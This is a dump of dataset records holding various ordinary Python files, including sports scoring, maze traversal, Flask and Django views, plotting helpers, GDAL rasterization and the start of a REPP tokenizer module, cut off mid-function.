ganadorDelCampeonato\n\n for partido in encuentrosDeportivos:\n\n if( len(partido) == 4 ):\n\n\n if( partido[1] < partido[3] ):\n\n puntajeEquipos.setdefault(partido[2],0)\n\n puntajeEquipos[partido[2]] = puntajeEquipos[partido[2]] + 2\n\n elif ( partido[1] > partido[3] ):\n\n puntajeEquipos.setdefault(partido[0],0)\n\n puntajeEquipos[partido[0]] = puntajeEquipos[partido[0]] + 2\n\n else:\n\n puntajeEquipos.setdefault(partido[2],0)\n\n puntajeEquipos[partido[2]] = puntajeEquipos[partido[2]] + 1\n\n puntajeEquipos.setdefault(partido[0],0)\n\n puntajeEquipos[partido[0]] = puntajeEquipos[partido[0]] + 1\n\n\n for equipo in puntajeEquipos:\n\n if( max(puntajeEquipos.values()) == puntajeEquipos.get(equipo) ):\n\n ganadorDelCampeonato = equipo\n\n return ganadorDelCampeonato\n\n\n\ndef ejercicio4(var1):\n return ganadorDeCampeonatoDeFutbol(var1)\n\ncampeonato = []\nprint(ejercicio4(campeonato)) # \"\"\n\ncampeonato = [(\"a\",1,\"b\",0)]\nprint(ejercicio4(campeonato)) # a\n\ncampeonato = [(\"a\",1,\"b\",0),(\"a\",1,\"c\",2),(\"c\",3,\"b\",0)]\nprint(ejercicio4(campeonato)) # c\n\ncampeonato = [(\"a\",1,\"b\",1),(\"a\",1,\"c\",1),(\"c\",1,\"b\",1)]\nprint(ejercicio4(campeonato)) # a b c (cualquiera de las 3)\n\ncampeonato = [(\"a\",1,\"b\",-2),(\"a\",1,\"c\",1),(\"c\",1,\"b\",1),(\"d\",1,\"a\",9)]\nprint(ejercicio4(campeonato)) # a","sub_path":"ejercicio4.py","file_name":"ejercicio4.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"184882930","text":"# --------------\n# Code starts here\r\n\r\n# Create the lists \r\nclass_1 = ['Geoffrey Hinton','Andrew Ng','Sebastian Raschka','Yoshua Bengio']\r\nclass_2 = ['Hilary Mason','Carla Gentry','Corinna Cortes']\r\n# Concatenate both the 
strings\r\n\r\nnew_class = class_1 + class_2\r\nprint(new_class)\r\n# Append the list\r\nnew_class.append('Peter Warden')\r\n# Print updated list\r\n\r\nprint(new_class)\r\n# Remove the element from the list\r\nnew_class.pop(5)\r\n# Print the list\r\n\r\nprint(new_class)\r\n\r\n# Create the Dictionary\r\n\r\ncourses = {'Math': 65, 'English': 70, 'History': 80, 'French': 70, 'Science': 60}\r\n\r\n# Store the all the subject in one variable `Total`\r\nTotal = 65 + 70 + 80 + 70 + 60\r\n# Print the total\r\nprint(Total)\r\n# Insert percentage formula\r\npercentage = (Total / len(courses)) * 100\r\n# Print the percentage\r\nprint(percentage)\r\n\r\n# Create the Dictionary\r\n \r\nmathematics = {'Geoffrey Hinton': 78,\r\n'Andrew Ng': 95,\r\n'Sebastian Raschka': 65,\r\n'Yoshua Benjio': 50,\r\n'Hilary Mason':\t70,\r\n'Corinna Cortes': 66,\r\n'Peter Warden':\t75}\r\n\r\n# Given string\r\n\r\ntopper = max(mathematics,key = mathematics.get)\r\nprint (topper)\r\n# Create variable first_name \r\nprint('-'*20)\r\nfirst_name = topper.split()[0]\r\nprint(first_name)\r\n# Create variable Last_name and store last two element in the list\r\nlast_name = topper.split()[1]\r\nprint(last_name)\r\nfull_name = []\r\n# Concatenate the string\r\nfull_name = first_name + ' ' + last_name\r\n# print the full_name\r\nprint(full_name)\r\n# print the name in upper case\r\nfull_name.upper()\r\nprint(full_name)\r\ncertificate_name = 'NG ANDREW'\r\nprint(certificate_name)\r\n# Code ends here\n\n\n","sub_path":"Student-Management-Project/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"38987766","text":"import sys\nsys.path.append('../graph')\n\nfrom util import Stack, Queue\n\nfrom room import Room\nfrom player import Player\nfrom world import World\n\nimport random\nfrom ast import literal_eval\n\n# Load world\nworld = World()\n\n#construct a traversal graph\n#do dft for finding all the possible room player can move\n#do bfs for finding unexplored direction\n\n# You may uncomment the smaller graphs for development and testing purposes.\n#map_file = \"maps/test_line.txt\"\n#map_file = \"maps/test_cross.txt\"\n#map_file = \"maps/test_loop.txt\"\n#map_file = \"maps/test_loop_fork.txt\"\nmap_file = \"maps/main_maze.txt\"\n\n# Loads the map into a dictionary\nroom_graph=literal_eval(open(map_file, \"r\").read())\nworld.load_graph(room_graph)\n\n# Print an ASCII map\nworld.print_rooms()\n\n\nplayer = Player(world.starting_room)\nplayer.current_room = world.starting_room\n\n\n\nopposit_dic = {'n': 's',\n 's': 'n',\n 'e': 'w',\n 'w': 'e'\n }\n\ntraversal_path = []\n\ndef bfs(current_room):\n \"\"\"\n BFS for the unexplored room, then \n Return the path to it\n \"\"\"\n #add the visited room\n visited = set() \n #rooms to check\n q =[]\n q.append((current_room, []))\n count = 0\n #create a visited vertex\n while len(q)>0:\n #dequeue the current room exist\n (room, path) = q.pop(0)\n if room in visited :\n continue\n else:\n visited.add(room)\n for direction in visited_room[room]:\n if visited_room[room][direction] == '?':\n return [path, direction]\n elif visited_room[room][direction] is not None:\n update_path = path.copy()\n update_path.append(direction)\n next_room = visited_room[room][direction]\n q.append((next_room, update_path))\n return None\nimport random\ndef dft(unexplored_dir):\n #create an empty stack and add the starting room exists directions\n stack = Stack()\n stack.push(unexplored_dir)\n\n 
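# Editor's compact, generic version of the search described in the comments
# above (separate from the game-specific bfs): breadth-first over a
# {room: {direction: room_or_'?'}} map, returning the move sequence that
# reaches the nearest unexplored exit, or None when the map is complete.
def path_to_unexplored(graph, start):
    queue, seen = [(start, [])], set()
    while queue:
        room, path = queue.pop(0)
        if room in seen:
            continue
        seen.add(room)
        for direction, nxt in graph[room].items():
            if nxt == '?':
                return path + [direction]
            queue.append((nxt, path + [direction]))
    return None

assert path_to_unexplored({0: {'n': 1, 'e': '?'}, 1: {'s': 0}}, 0) == ['e']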
#while stack is not empty\n while stack.size() >0:\n #pop the current room exits direction\n current_exit = stack.pop()\n move_dir =current_exit[-1]\n # if this direction is not explored\n if move_dir not in visited_room[player.current_room.id]:\n continue\n elif visited_room[player.current_room.id][move_dir] =='?':\n previous_room = player.current_room.id\n #move player in that direction\n player.travel(move_dir)\n # store the movement in the traversal path\n traversal_path.append(move_dir)\n # update the unexplored direction in the dictionary\n visited_room[previous_room][move_dir] = player.current_room.id\n opposite_value = opposit_dic[move_dir]\n if player.current_room.id not in visited_room:\n #if visited_room[player.current_room.id]\n visited_room[player.current_room.id] = {opposite_value:previous_room}\n else:\n visited_room[player.current_room.id][opposite_value]= previous_room\n # get all the neighbour room direction\n for direction in player.current_room.get_exits():\n if direction not in visited_room[player.current_room.id]:\n visited_room[player.current_room.id][direction]='?'\n new_dir = []\n new_dir.append(direction)\n stack.push(new_dir)\n unexplored_dir = bfs(player.current_room.id)\n if unexplored_dir !=None:\n for direction in unexplored_dir[0]:\n player.travel(direction)\n traversal_path.append(direction)\n dft([unexplored_dir[1]])\n\nstarting_dir = random.choice(player.current_room.get_exits())\n\nvisited_room ={player.current_room.id :{}}\nfor direction in player.current_room.get_exits():\n visited_room[player.current_room.id][direction] ='?'\n\ndft([starting_dir])\n\n\n\n# Fill this out with directions to walk\n#traversal_path = ['n', 'n']\n\n\n\n# TRAVERSAL TEST\nvisited_rooms = set()\nplayer.current_room = world.starting_room\nvisited_rooms.add(player.current_room)\nfor move in traversal_path:\n player.travel(move)\n visited_rooms.add(player.current_room)\n\nif len(visited_rooms) == len(room_graph):\n print(f\"TESTS PASSED: {len(traversal_path)} moves, {len(visited_rooms)} rooms visited\")\nelse:\n print(\"TESTS FAILED: INCOMPLETE TRAVERSAL\")\n print(f\"{len(room_graph) - len(visited_rooms)} unvisited rooms\")\n# # queue = Queue()\n# #create dic for visited vertex and path\n# visited = {} # Note that this is a dictionary, not a set\n# #enqueue the queue with the starting user_id as a path\n# queue.enqueue([player.current_room])\n# #while queue is not empty\n# while queue.size()>0:\n# #dequeue the current path\n# current_path = queue.dequeue()\n# #get the current vertex from end of the path\n# current_room = current_path[-1]\n# if current_room not in visited:\n# visited[current_room] = current_path\n# #queue up all the neighbours as path\n# for direction in player.current_room.get_exits():\n\n# new_path = current_path.copy()\n# new_path.append(direction)\n# queue.enqueue(new_path)\n\n\n#######\n# UNCOMMENT TO WALK AROUND\n#######\n# player.current_room.print_room_description(player)\n# while True:\n# cmds = input(\"-> \").lower().split(\" \")\n# if cmds[0] in [\"n\", \"s\", \"e\", \"w\"]:\n# player.travel(cmds[0], True)\n# elif cmds[0] == \"q\":\n# break\n# else:\n# print(\"I did not understand that command.\")\n","sub_path":"projects/adventure/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"639865662","text":"import logging\n\nfrom flask import Flask\nfrom flask_jwt_extended import JWTManager\nfrom sqlalchemy import create_engine\n\nfrom 
server.routing import register_routes\nfrom config import config\n\nlogger = logging.getLogger(__name__)\n\n\nclass App:\n\tdef __init__(self, config):\n\t\tself._config = config\n\t\tself._flask = Flask(__name__)\n\t\tself._init_token_auth()\n\t\tself.db_engine = create_engine(config['database']['objects']['uri'])\n\n\t\tregister_routes(self)\n\n\tdef _init_token_auth(self):\n\t\tself._flask.config['JWT_SECRET_KEY'] = config['secret']\n\t\tself._flask.config['JWT_ACCESS_TOKEN_EXPIRES'] = config['token_expires']\n\t\tself._jwt = JWTManager(self._flask)\n\n\tdef register_route(self, Resource, view, *endpoints):\n\t\tfor endpoint in endpoints:\n\t\t\tself._flask.add_url_rule(endpoint, view, Resource.as_view(view, app=self))\n\n\tdef run(self):\n\t\thost = self._config['host']\n\t\tport = self._config['port']\n\t\tlogger.info('Listening {} on {} port'.format(host, port))\n\t\tself._flask.run(host=host, port=port)\n\n\napp = App(config)\n","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"253510303","text":"import os\nimport pytest\n\nimport virtool.jobs.create_sample\n\n\n@pytest.fixture\ndef test_create_sample_job(mocker, tmpdir, loop, request, dbi, dbs, test_db_connection_string, test_db_name):\n tmpdir.mkdir(\"samples\")\n tmpdir.mkdir(\"logs\").mkdir(\"jobs\")\n\n settings = {\n \"data_path\": str(tmpdir),\n \"db_name\": test_db_name,\n \"create_sample_proc\": 6\n }\n\n q = mocker.Mock()\n\n job = virtool.jobs.create_sample.Job(\n test_db_connection_string,\n test_db_name,\n settings,\n \"foobar\",\n q\n )\n\n dbs.jobs.insert_one({\n \"_id\": \"foobar\",\n \"task\": \"create_sample\",\n \"args\": {\n \"sample_id\": \"baz\",\n \"files\": [\n {\n \"id\": \"foo.fq.gz\"\n }\n ]\n },\n \"proc\": 2,\n \"mem\": 4\n })\n\n job.init_db()\n\n return job\n\n\ndef test_check_db(mocker, test_create_sample_job):\n expected = {\n \"foo\": \"bar\"\n }\n\n m_get_sample_params = mocker.patch(\"virtool.jobs.utils.get_sample_params\", return_value=expected)\n\n test_create_sample_job.check_db()\n\n m_get_sample_params.assert_called_with(\n test_create_sample_job.db,\n test_create_sample_job.settings,\n {\n \"sample_id\": \"baz\",\n \"files\": [{\n \"id\": \"foo.fq.gz\"\n }]\n }\n )\n\n assert test_create_sample_job.params == expected\n\n\n@pytest.mark.parametrize(\"exists\", [None, \"sample\", \"fastqc\", \"analysis\"])\ndef test_make_sample_dir(exists, tmpdir, test_create_sample_job):\n \"\"\"\n Test that the function makes the specified sample tree even if the sample path and/or the analysis path already\n exist.\n\n \"\"\"\n sample_path = os.path.join(tmpdir, \"foo\")\n\n test_make_sample_dir.params = {\n \"sample_path\": sample_path,\n \"analysis_path\": os.path.join(sample_path, \"analysis\"),\n \"fastqc_path\": os.path.join(sample_path, \"fastqc\")\n }\n\n if exists is not None:\n os.makedirs(test_make_sample_dir.params[f\"{exists}_path\"])\n\n\n\n\n\n\n\n","sub_path":"tests/jobs/test_create_sample.py","file_name":"test_create_sample.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"651239284","text":"from collections import deque\nclass Solution:\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n parent_lookup = {}\n if not root:\n return None\n queue = 
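# Editor's note (an assumption about intent, not text from the record): the
# test_make_sample_dir test above assigns `test_make_sample_dir.params` and
# reads that same attribute for os.makedirs, i.e. it stores state on the test
# function object itself; the fixture it receives suggests the intended
# target was the job, roughly:
#     test_create_sample_job.params = {...}
#     os.makedirs(test_create_sample_job.params[f"{exists}_path"])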
deque([root])\n while queue:\n node = queue.popleft()\n if node.left:\n parent_lookup[node.left] = node\n queue.append(node.left)\n if node.right:\n parent_lookup[node.right] = node\n queue.append(node.right)\n p_p = set()\n while True:\n p_p.add(p)\n try:\n p = parent_lookup[p]\n except:\n break\n\n while q:\n if q in p_p:\n return q\n q = parent_lookup[q]","sub_path":"mock/lowest_common_ancestor_of_a_bin_tree.py","file_name":"lowest_common_ancestor_of_a_bin_tree.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"521663297","text":"#!python3\nfrom ete3 import Tree\nimport argparse\n\n\ndef is_float(x):\n try:\n float(x.replace('\\'', \"\"))\n return True\n except ValueError:\n return False\n\n\ndef tree_plot(input_tree):\n t = Tree(input_tree, format=1)\n names = set()\n for node in t.traverse():\n if not node.name or is_float(node.name):\n if node.is_root():\n name = \"Root\"\n else:\n leaves = node.get_leaf_names()\n name = \"\".join([i[0:(int(12 / len(leaves)) + 1)] for i in leaves])\n while name in names:\n name += \"Bis\"\n names.add(name)\n node.name = name\n print(node.name)\n t.write(format=1, outfile=input_tree + \".annotated\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-t', '--tree', required=False, type=str,\n default='../DataEmpirical/PrimatesBinaryLHTShort/rootedtree.nwk', dest=\"t\", metavar=\"\",\n help=\"The tree to be re-written\")\n args = parser.parse_args()\n tree_plot(args.t)\n","sub_path":"scripts/name_internal_nodes_tree.py","file_name":"name_internal_nodes_tree.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"442223853","text":"from django.shortcuts import render\nfrom numpy import dot\nimport json\nimport numpy as np\nimport pandas as pd\nfrom numpy.linalg import norm\nfrom rest_framework import viewsets\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom django.http import JsonResponse\nfrom reviews.models import Review\nfrom stores.models import Store\nfrom accounts.models import Follow,User,Wish\nimport random\n\n# from .serializers import RecommendSerializer\n\nfrom .models import reviewcategory\n\n# Create your views here.\n\n# 리뷰 카테고리 테이블 넣기\ndef insert_data(data,user_id):\n if reviewcategory.objects.filter(user_id=user_id).exists() :\n pass\n else :\n reviewcategory.objects.create(\n user_id = user_id ,\n krzzimandtang = data[0],\n krbbq = data[1],\n krgukbap = data[2],\n krstewandcasserole = data[3],\n krporkfeetandBossam = data[4],\n krseafood = data[5],\n krnoodles = data[6],\n krhomecooking = data[7],\n krchicken=data[8],\n krfood=data[9],\n bunsick=data[10],\n jpfriedfood=data[11],\n jpsashimi=data[12],\n jphomecooking=data[13],\n jpseafood=data[14],\n jpnoodles=data[15],\n jpfood=data[16],\n cddrink=data[17],\n cdcafe=data[18],\n cddessert=data[19],\n chnoodles=data[20],\n chfriedfood=data[21],\n chbbq=data[22],\n chfood=data[23],\n wenoodles=data[24],\n wepizza=data[25],\n wesalad=data[26],\n wefood=data[27],\n brbar=data[28],\n brjpanbar=data[29],\n bkbakery=data[30],\n fffood=data[31]\n ).save()\n\n\n\ndef calcos(myinfo,info_list):\n\n index = [0]*34\n A={}\n result = {}\n returnresult = []\n\n\n for i , (key, value) in enumerate(myinfo[0].items()):\n index[i] = 
value\n\n # 필요없는 데이터 제거\n del index[0]\n del index[0]\n for i in range(len(info_list)):\n B = [0]*34\n for j ,(key,value) in enumerate(info_list[i].items()):\n B[j] = value\n\n # 필요없는 데이터 제거\n del B[0]\n del B[0]\n \n # 빅데이터 분석\n re = dot(index, B) / (norm(index) * norm(B))\n strindex = info_list[i]['user_id']\n result[strindex] = re\n\n # 연관성 0 인 사람을 제외하고 전부다 리스트 삽입\n for key,value in result.items():\n if value != 0:\n A[key] = value\n\n # 연관성 가장 높은순으로 정렬\n dummy = sorted(A.items(),key=lambda x:x[1],reverse=True)\n\n # 분석 결과 값에서 id만 추출하여 리턴\n for i in dummy:\n returnresult.append(i[0])\n return returnresult\n\ndef categorysearch(my_interest):\n dic = []\n if(my_interest.krzzimandtang != 0):\n dic.append(\"한식찜/탕\")\n if(my_interest.krbbq != 0):\n dic.append(\"한식고기집\")\n if(my_interest.krgukbap != 0):\n dic.append(\"한식국밥\")\n if(my_interest.krstewandcasserole != 0):\n dic.append(\"한식전골/찌개\")\n if(my_interest.krporkfeetandBossam != 0):\n dic.append(\"한식족발/보쌈\")\n if(my_interest.krseafood != 0):\n dic.append(\"한식해산물\")\n if(my_interest.krhomecooking != 0):\n dic.append(\"한식가정식\")\n if(my_interest.krnoodles != 0):\n dic.append(\"한식면요리\")\n if(my_interest.krchicken != 0):\n dic.append(\"한식치킨\")\n if(my_interest.krfood != 0):\n dic.append(\"한식한식\")\n if(my_interest.bunsick != 0):\n dic.append(\"분식분식\")\n if(my_interest.jpfriedfood != 0):\n dic.append(\"일식튀김\")\n if(my_interest.jpsashimi != 0):\n dic.append(\"일식회\")\n if(my_interest.jphomecooking != 0):\n dic.append(\"일식가정식\")\n if(my_interest.jpseafood != 0):\n dic.append(\"일식어패류\")\n if(my_interest.jpnoodles != 0):\n dic.append(\"일식면요리\")\n if(my_interest.jpfood != 0):\n dic.append(\"일식일식\")\n if(my_interest.cddrink != 0):\n dic.append(\"카페음료\")\n if(my_interest.cdcafe != 0):\n dic.append(\"카페카페\")\n if(my_interest.cddessert != 0):\n dic.append(\"카페디저트\")\n if(my_interest.chnoodles != 0):\n dic.append(\"중식면요리\")\n if(my_interest.chfriedfood != 0):\n dic.append(\"중식튀김요리\")\n if(my_interest.chbbq != 0):\n dic.append(\"중식구이요리\")\n if(my_interest.chfood != 0):\n dic.append(\"중식중식\")\n if(my_interest.wenoodles != 0):\n dic.append(\"양식면요리\")\n if(my_interest.wepizza != 0):\n dic.append(\"양식피자\")\n if(my_interest.wesalad != 0):\n dic.append(\"양식샐러드\")\n if(my_interest.wefood != 0):\n dic.append(\"양식해외요리\")\n if(my_interest.brbar != 0):\n dic.append(\"술집술집\")\n if(my_interest.brjpanbar != 0):\n dic.append(\"술집일본선술집\")\n if(my_interest.bkbakery != 0):\n dic.append(\"빵집빵집\")\n if(my_interest.fffood != 0):\n dic.append(\"패스트푸드햄버거\")\n return dic\n\ndef region_index(region_name):\n dummy = {'경북' : '경상북도','경남':'경상남도','충북':'충청북도','충남':'충청남도','전북':'전라북도','전남':'전라남도', '경기' :'경기도','강원':'강원도'}\n returnindex = []\n returnindex.append(region_name)\n returnindex.append(dummy[region_name])\n return returnindex\n\n#추천인 연산해서 리턴하기\n@api_view(['GET'])\ndef recommenduser(request,id):\n info_list = list(reviewcategory.objects.exclude(user_id = id).values())\n myinfo = reviewcategory.objects.filter(user_id = id).values()\n result_list = calcos(myinfo,info_list)\n follower_list = Follow.objects.filter(following_id = id).values('follow_id')\n\n recommend_follower =[]\n \n # 추천인에 팔로우 한사람은 안뜨게 제거\n for i in follower_list:\n try:\n result_list.remove(i['follow_id'])\n except ValueError:\n pass\n \n # 정보 넣어서 리턴\n for i in result_list:\n user = User.objects.get(id=i)\n recommend_follower.append({\n \"id\": user.id,\n \"nickname\": user.nickname,\n \"email\": user.email,\n \"address\": user.address,\n \"spoon_cnt\": user.spoon_cnt,\n \"grade\" : user.grade,\n })\n\n return 
JsonResponse(recommend_follower,safe = False, json_dumps_params={'ensure_ascii': False} ,status=status.HTTP_200_OK)\n\n#가게추천 연산해서 리턴하기\n@api_view(['GET'])\ndef recommendStore(request,id):\n if User.objects.filter(id=id).exists():\n\n region_name = User.objects.filter(id=id).values('address')\n region_name = region_name[0]['address'].split()\n \n follower_id = Follow.objects.filter(following_id=id)\n \n my_interest = reviewcategory.objects.get(user_id = id)\n my_category = categorysearch(my_interest)\n wish_store = Wish.objects.filter(user_id = id)\n\n follower = []\n store = []\n dummy_store = []\n dummy_store2 = []\n review = []\n flag = False\n search_index = []\n\n #팔로우 한 사람들 id 받아오기\n for f in follower_id:\n fw = User.objects.get(id=f.follow_id)\n follower.append(fw.id)\n \n\n if(region_name[0] in (\"서울\",\"부산\",\"대구\",\"인천\",\"광주\",\"울산\",\"대전\",\"제주\",\"세종\")):\n flag = True\n else:\n search_index = region_index(region_name[0])\n\n #팔로우 된 사람들이 쓴 리뷰중 사용자에게 맞는 음식점 목록 불러오기\n #특별시 및 광역시 와 각종 도를 구분하여 검색\n if(flag == True):\n for fwid in follower:\n rv = Review.objects.filter(user_id=fwid).values()\n \n for st in rv:\n string = Store.objects.get(id=st['store_id'])\n for j in my_category:\n if(j == (string.main_category+string.middle_category) and region_name[0] in string.address):\n dummy_store.append(string.id)\n else:\n for fwid in follower:\n rv = Review.objects.filter(user_id=fwid).values()\n for st in rv:\n string = Store.objects.get(id=st['store_id'])\n for j in my_category:\n if(j == (string.main_category+string.middle_category) and region_name[1] in string.address):\n if(search_index[0] in string.address or search_index[1] in string.address):\n dummy_store.append(string.id)\n #중복제거\n for i in dummy_store:\n if i not in dummy_store2:\n dummy_store2.append(i)\n\n # 좋아요된 가게제거\n for i in wish_store:\n try:\n dummy_store2.remove(i.store_id)\n except ValueError:\n pass\n\n # 가게 정보 입력\n for i in dummy_store2:\n string = Store.objects.get(id=i)\n store.append({\n \"id\": string.id,\n \"store_name\": string.store_name,\n \"area\" : string.area,\n \"tel\" : string.tel,\n \"address\" : string.address,\n \"lat\" : string.lat,\n \"lng\" : string.lng,\n \"main_category\" : string.main_category,\n \"middle_category\" : string.middle_category,\n \"review_cnt\" : string.review_cnt,\n \"star\" : string.star,\n \"pet\" : string.pet,\n \"children\" : string.children,\n \"parent\" : string.parent,\n \"friend\" : string.friend\n })\n\n\n return JsonResponse(store,safe = False, json_dumps_params={'ensure_ascii': False} ,status=status.HTTP_200_OK)\n else:\n return Response({'message': '회원정보가 존재하지 않습니다'}, status=status.HTTP_400_BAD_REQUEST)\n\n# 동행자 가게 추천\n@api_view(['POST'])\ndef recommendcompanion(request):\n id = request.data.get('user_id')\n companion = request.data.get('companion')\n if User.objects.filter(id = id).exists():\n \n user = User.objects.get(id = id)\n region_name = user.address\n region_name = region_name.split()\n \n if(region_name[0] in (\"서울\",\"부산\",\"대구\",\"인천\",\"광주\",\"울산\",\"대전\",\"제주\",\"세종\")):\n dataframe = pd.DataFrame(list(Store.objects.filter(address__contains = region_name[0]).values()))\n else:\n search_index = region_index(region_name[0])\n dataframe = pd.DataFrame(list(Store.objects.filter(address__contains = search_index[0]).values() | Store.objects.filter(address__contains = search_index[1]).values()))\n \n pd.set_option('display.max_rows', None)\n \n df_store = dataframe[dataframe['address'].str.contains(region_name[1])]\n \n df_sort = 
df_store.sort_values(by=companion, ascending=False).head(200)\n \n js = df_sort.to_json(orient = 'records' ,force_ascii = False)\n \n \n return JsonResponse(json.loads(js),safe = False ,status=status.HTTP_200_OK)\n else:\n return Response({'message':'실패'},status=status.HTTP_400_BAD_REQUEST)","sub_path":"server/recommend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"468430863","text":"# graficke znazorneni kovariancni matice\n# model matrix s parametrizaci\n# \nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\n\n\ndef kresli(df, col, y):\n \"\"\"\n df: dataframe with columns col, y, possibly others\n col: name of a column to group by\n y: target variable to to calculate means of in each group of col\n returns: pandas dataframe with count, badrate for each category of col\n it shows a graph, too\n \"\"\"\n grouped = df.groupby(col)\n tabulka = grouped.agg({y: [lambda x: x.shape[0], np.mean] })\n tabulka.columns = ['count', 'badrate']\n tabulka['podil'] = tabulka['count']/df.shape[0]\n tabulka = tabulka.sort_values(by='badrate')\n tabulka.reset_index(inplace=True)\n sns.set_style('whitegrid')\n #sns.distplot(a=df['typ_rodiny'], kde=False, hist=True, norm_hist=True)\n #plt.hist(df['typ_rodiny'], normed=False)\n #plt.plot([1000, 1200, 0.5, 0.2, 0.1])\n plt.ylim(0,1)\n tabulka['podil'].plot(kind='bar')\n tabulka['badrate'].plot(style='ko')\n tabulka['badrate'].plot(style='r-')\n plt.show()\n return tabulka\n\n\ndef plot_corr(df,size=10):\n '''Function plots a graphical correlation matrix for each pair of columns in the dataframe.\n\n Input:\n df: pandas DataFrame\n size: vertical and horizontal size of the plot'''\n\n corr = np.abs(df.corr())\n fig, ax = plt.subplots(figsize=(size, size))\n ax.matshow(corr)\n plt.xticks(range(len(corr.columns)), corr.columns, rotation=90)\n plt.yticks(range(len(corr.columns)), corr.columns)\n plt.matshow(np.arange(0, 1, 0.01).reshape(1, -1))\n plt.show()\n \n \ndef parallel_coordinates(df, class_column, rotation=45):\n \"\"\"\n Parallel coordinates plotting.\n\n Parameters\n ----------\n df: DataFrame\n class_column: str\n Column name containing class names\n rotation: int\n rotate labels on the x axis of the figure\n \n Returns\n -------\n ax: matplotlib axis object\n \"\"\"\n from pandas.tools.plotting import parallel_coordinates as parcoord\n ax = parcoord(df, class_column)\n locs, labels = plt.xticks()\n plt.setp(labels, rotation=rotation)\n plt.show()\n return ax\n\n\n","sub_path":"pokracovani/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"136501267","text":"import gdal\r\nimport ogr\r\n\r\nnaip_fn = 'Cropped_Colombia_Area_3.tiff'\r\nnaip_ds = gdal.Open(naip_fn)\r\n\r\ntrain_fn = 'C:/temp/eosImages/train.shp'\r\ntrain_ds = ogr.Open(train_fn)\r\nlyr = train_ds.GetLayer()\r\ndriver = gdal.GetDriverByName('MEM')\r\ntarget_ds = driver.Create('', naip_ds.RasterXSize, naip_ds.RasterYSize, 1, gdal.GDT_UInt16)\r\ntarget_ds.SetGeoTransform(naip_ds.GetGeoTransform())\r\ntarget_ds.SetProjection(naip_ds.GetProjection())\r\noptions = ['ATTRIBUTE=id']\r\ngdal.RasterizeLayer(target_ds, [1], lyr, options=options)\r\ndata = target_ds.GetRasterBand(1).ReadAsArray()\r\nprint('min', data.min(), 'max', data.max(), 'mean', 
data.mean())\r\n","sub_path":"OSGDAL/rasterize_truth_data.py","file_name":"rasterize_truth_data.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"634863606","text":"# coding: utf-8\n\n\"\"\"\nRegular Expression Preprocessor (REPP)\n\"\"\"\n\nfrom typing import NamedTuple\nfrom sre_parse import parse_template\nfrom pathlib import Path\nfrom array import array\nimport warnings\nimport logging\n\n# use regex library if available; otherwise warn\ntry:\n import regex as re\n re.DEFAULT_VERSION = re.V1\n _regex_available = True\nexcept ImportError:\n import re # type: ignore\n _regex_available = False\n\nfrom delphin.tokens import YYToken, YYTokenLattice\nfrom delphin.lnk import Lnk\nfrom delphin.exceptions import PyDelphinException, PyDelphinWarning\n# Default modules need to import the PyDelphin version\nfrom delphin.__about__ import __version__ # noqa: F401\n\n\nlogger = logging.getLogger(__name__)\n\n\n#: The tokenization pattern used if none is given in a REPP module.\nDEFAULT_TOKENIZER = r'[ \\t]+'\n\n\nclass REPPError(PyDelphinException):\n \"\"\"Raised when there is an error in tokenizing with REPP.\"\"\"\n\n\nclass REPPWarning(PyDelphinWarning):\n \"\"\"Issued when REPP may not behave as expected.\"\"\"\n\n\nif not _regex_available:\n warnings.warn(\n \"The 'regex' library is not installed, so some regular expression \"\n \"features may not work as expected. Install PyDelphin with the \"\n \"[repp] extra to include the 'regex' library.\",\n REPPWarning)\n\n\nclass REPPResult(NamedTuple):\n \"\"\"\n The final result of REPP application.\n\n Attributes:\n string (str): resulting string after all rules have applied\n startmap (:py:class:`array`): integer array of start offsets\n endmap (:py:class:`array`): integer array of end offsets\n \"\"\"\n string: str\n startmap: array\n endmap: array\n\n\nclass _REPPOperation(object):\n \"\"\"\n The supertype of REPP groups and rules.\n\n This class defines the apply(), trace(), and tokenize() methods\n which are available in [_REPPRule], [_REPPGroup],\n [_REPPIterativeGroup], and [REPP] instances.\n \"\"\"\n def _apply(self, s, active):\n raise NotImplementedError()\n\n def apply(self, s, active=None):\n logger.info('apply(%r)', s)\n for step in self._trace(s, active, False):\n pass # we only care about the last step\n return step\n\n def trace(self, s, active=None, verbose=False):\n logger.info('trace(%r)', s)\n yield from self._trace(s, active, verbose)\n\n def _trace(self, s, active, verbose):\n startmap = _zeromap(s)\n endmap = _zeromap(s)\n # initial boundaries\n startmap[0] = 1\n endmap[-1] = -1\n step = None\n for step in self._apply(s, active):\n if step.applied or verbose:\n yield step\n if step.applied:\n startmap = _mergemap(startmap, step.startmap)\n endmap = _mergemap(endmap, step.endmap)\n if step is not None:\n s = step.output\n 